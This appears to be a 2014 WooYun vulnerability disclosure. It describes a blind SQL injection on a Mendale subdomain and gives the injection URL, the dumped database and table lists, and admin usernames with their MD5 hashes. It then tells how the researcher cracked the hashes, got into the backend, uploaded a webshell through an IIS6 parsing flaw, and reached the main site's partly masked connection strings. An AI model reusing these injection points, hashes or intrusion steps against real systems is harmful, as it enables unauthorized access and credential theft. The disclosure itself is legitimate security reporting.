当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-056996

漏洞标题:梦洁家纺sql注射影响主站

相关厂商:mendale.com

漏洞作者: 卡卡

提交时间:2014-04-14 10:53

修复时间:2014-05-29 10:54

公开时间:2014-05-29 10:54

漏洞类型:成功的入侵事件

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-04-14: 细节已通知厂商并且等待厂商处理中
2014-04-15: 厂商已经确认,细节仅向厂商公开
2014-04-25: 细节向核心白帽子及相关领域专家公开
2014-05-05: 细节向普通白帽子公开
2014-05-15: 细节向实习白帽子公开
2014-05-29: 细节向公众公开

简要描述:

梦洁家纺某站sql注射,有木有礼物?

详细说明:

问题出现在这个站点

http://love.mendale.com.cn/


一个盲注,注的很慢~~~
注入点:

http://love.mendale.com.cn/html/news/newsfast.aspx?MenuID=4&SearchInfo=1


注入信息:

.png


库:

available databases [6]:
[*] [mengjie\x03]
[*] master
[*] Mendale
[*] model
[*] msdb
[*] tempdb


当前库:Mendale
表:

Database: Mendale
[37 tables]
+------------------+
| Culture |
| Employment |
| FamilySituation |
| Glimpses |
| GlimpsesType |
| IPAddress |
| IPBlacklist |
| IPVisit |
| ImageCarousel |
| InvDown |
| InvDownType |
| InvRelations |
| JobAppForm |
| JobType |
| ManageUser |
| Menu |
| Mess |
| MessType |
| NewType |
| News |
| OperationLog |
| OperationType |
| RecAnnouncement |
| RecType |
| Roles |
| SpecialReports |
| Television |
| TelevisionType |
| TopicType |
| UserLoginLog |
| WorkExperience |
| Bo?" |
| Brand♣☻ |
| CulType◄☻ |
| `\?81uSituation |
| dtpropertiey☻Q!A |
| aB |
+------------------+


由于是盲注,所以有些没正常显示,但是不影响
管理账号:

Table: ManageUser
[4 entries]
+----------------------------------+------------+
| loginpwd | LoginUser |
+----------------------------------+------------+
| 4A3D04E200DB98302A50615DB2FD59C5 | 1 |
| 534754E15742134EBFC084532A93AE99 | WUWW |
| 7F59FA288A11AC121FD605E09940E45D | MJHR |
| 80CBA3D0DBD1F6A80B4DC8C59DFBBD94 | wujuan2005 |
+----------------------------------+------------+


后台地址:

http://love.mendale.com.cn/webmaster/Index.aspx


破解md5,成功登陆后台

.png


利用iis6解析漏洞,成功拿到shell

shell.png


发现主站也在这台机器上面,而且目录权限很宽松,直接跨主站无压力,来个txt装装逼

txt.png


数据库信息一览无遗

<add name="Mendale" connectionString="server=.;user id=mjjt****;password=eman****;database=Mendale;min pool size=4;max pool size=512;packet size=3072" providerName="System.Data.SqlClient"/>
<add name="Mendale.mdb" providerName="System.Data.OleDb" connectionString="Provider=Microsoft.Jet.OLEDB.4.0;Data Source=|DataDirectory|Mendale.mdb;"/>
<add name="OraConnString" connectionString="Data Source=localhost;user id=BS;password=********;min pool size=4;max pool size=4" providerName="System.Data.OracleClient"></add>


.png


关键部位星号代替。。
asp权限都可以执行命令,目测提权无压力
只是检测,并未任何破坏,shell请自行删除
rank有木有?妹子有木有?礼物有木有?

漏洞证明:

注入点:

http://love.mendale.com.cn/html/news/newsfast.aspx?MenuID=4&SearchInfo=1


注入信息:

.png


库:

available databases [6]:
[*] [mengjie\x03]
[*] master
[*] Mendale
[*] model
[*] msdb
[*] tempdb


当前库:Mendale
表:

Database: Mendale
[37 tables]
+------------------+
| Culture |
| Employment |
| FamilySituation |
| Glimpses |
| GlimpsesType |
| IPAddress |
| IPBlacklist |
| IPVisit |
| ImageCarousel |
| InvDown |
| InvDownType |
| InvRelations |
| JobAppForm |
| JobType |
| ManageUser |
| Menu |
| Mess |
| MessType |
| NewType |
| News |
| OperationLog |
| OperationType |
| RecAnnouncement |
| RecType |
| Roles |
| SpecialReports |
| Television |
| TelevisionType |
| TopicType |
| UserLoginLog |
| WorkExperience |
| Bo?" |
| Brand♣☻ |
| CulType◄☻ |
| `\?81uSituation |
| dtpropertiey☻Q!A |
| aB |
+------------------+


由于是盲注,所以有些没正常显示,但是不影响
管理账号:

Table: ManageUser
[4 entries]
+----------------------------------+------------+
| loginpwd | LoginUser |
+----------------------------------+------------+
| 4A3D04E200DB98302A50615DB2FD59C5 | 1 |
| 534754E15742134EBFC084532A93AE99 | WUWW |
| 7F59FA288A11AC121FD605E09940E45D | MJHR |
| 80CBA3D0DBD1F6A80B4DC8C59DFBBD94 | wujuan2005 |
+----------------------------------+------------+


后台地址:

http://love.mendale.com.cn/webmaster/Index.aspx


破解md5,成功登陆后台

.png


利用iis6解析漏洞,成功拿到shell

shell.png


发现主站也在这台机器上面,而且目录权限很宽松,直接跨主站无压力,来个txt装装逼

txt.png


数据库信息一览无遗

<add name="Mendale" connectionString="server=.;user id=mjjt****;password=eman****;database=Mendale;min pool size=4;max pool size=512;packet size=3072" providerName="System.Data.SqlClient"/>
<add name="Mendale.mdb" providerName="System.Data.OleDb" connectionString="Provider=Microsoft.Jet.OLEDB.4.0;Data Source=|DataDirectory|Mendale.mdb;"/>
<add name="OraConnString" connectionString="Data Source=localhost;user id=BS;password=********;min pool size=4;max pool size=4" providerName="System.Data.OracleClient"></add>


.png


修复方案:

你们懂得啊~~~求妹子,求rank,求礼物~~~

版权声明:转载请注明来源 卡卡@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2014-04-15 14:39

厂商回复:

感谢提供信息

最新状态:

暂无


漏洞评价:

评论